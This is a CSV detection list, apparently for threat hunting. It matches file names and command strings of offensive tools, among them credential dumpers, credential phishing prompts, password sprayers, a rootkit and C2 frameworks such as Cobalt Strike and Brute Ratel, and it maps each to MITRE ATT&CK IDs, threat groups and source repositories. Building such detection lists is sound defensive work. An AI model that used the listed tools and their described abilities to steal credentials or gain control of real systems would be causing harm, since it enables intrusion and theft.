"*Credentials/CacheDump.*",".{0,1000}Credentials\/CacheDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","39051"
"*Credentials/certsync_*",".{0,1000}Credentials\/certsync_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39052"
"*Credentials/LSASecrets.*",".{0,1000}Credentials\/LSASecrets\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","39053"
"*Credentials/SAMDump*",".{0,1000}Credentials\/SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39054"
"*CredHistView.exe*",".{0,1000}CredHistView\.exe.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","1","N/A","N/A","9","9","N/A","N/A","N/A","N/A","39055"
"*credhistview.zip*",".{0,1000}credhistview\.zip.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","1","N/A","N/A","9","9","N/A","N/A","N/A","N/A","39056"
"*credmaster.py *",".{0,1000}credmaster\.py\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","39057"
"*CredMaster\passwords.txt*",".{0,1000}CredMaster\\passwords\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","39058"
"*CredPhisher.csproj*",".{0,1000}CredPhisher\.csproj.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","39059"
"*CredPhisher.exe*",".{0,1000}CredPhisher\.exe.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","39060"
"*credphisher.py*",".{0,1000}credphisher\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","39061"
"*cred-popper *",".{0,1000}cred\-popper\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39062"
"*CredPrompt/CredPrompt.cna*",".{0,1000}CredPrompt\/CredPrompt\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","39063"
"*creds_hunt.exe*",".{0,1000}creds_hunt\.exe.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","39064"
"*CredsLeaker*",".{0,1000}CredsLeaker.{0,1000}","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","N/A","4","316","68","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z","39065"
"*CredsPhish.ps1*",".{0,1000}CredsPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","39066"
"*Credz-Plz.ps1*",".{0,1000}Credz\-Plz\.ps1.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","39067"
"*Credz-Plz-Execute.txt*",".{0,1000}Credz\-Plz\-Execute\.txt.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","39068"
"*cribdragg3r/Alaris*",".{0,1000}cribdragg3r\/Alaris.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","39069"
"*crimeware*/zeus.profile*",".{0,1000}crimeware.{0,1000}\/zeus\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","39070"
"*crisis_monitor start*",".{0,1000}crisis_monitor\sstart.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39071"
"*crisis_monitor stop*",".{0,1000}crisis_monitor\sstop.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39072"
"*crisprss/PrintSpoofer*",".{0,1000}crisprss\/PrintSpoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","39073"
"*crk_get_key1*",".{0,1000}crk_get_key1.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39074"
"*crk_get_key2*",".{0,1000}crk_get_key2.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39075"
"*crk_max_keys_per_crypt*",".{0,1000}crk_max_keys_per_crypt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39076"
"*crk_methods.*",".{0,1000}crk_methods\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39077"
"*crk_password_loop*",".{0,1000}crk_password_loop.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39078"
"*cron_priv_esc(payload*",".{0,1000}cron_priv_esc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","39081"
"*Cronos Rootkit.*",".{0,1000}Cronos\sRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39082"
"*CronosDebugger.*",".{0,1000}CronosDebugger\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39083"
"*CronosRootkit.*",".{0,1000}CronosRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39084"
"*CrontabPersistence.json*",".{0,1000}CrontabPersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","39086"
"*CroodSolutions/AutoPwnKey*",".{0,1000}CroodSolutions\/AutoPwnKey.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39087"
"*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*",".{0,1000}crop\.exe\s\\\\.{0,1000}\\.{0,1000}\.lnk\s\\\\.{0,1000}\\harvest\s\\\\.{0,1000}\\harvest.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","39088"
"*cross_s4u.c*",".{0,1000}cross_s4u\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","39089"
"*cross_s4u.x64.o*",".{0,1000}cross_s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","39090"
"*CrossC2 beacon*",".{0,1000}CrossC2\sbeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39091"
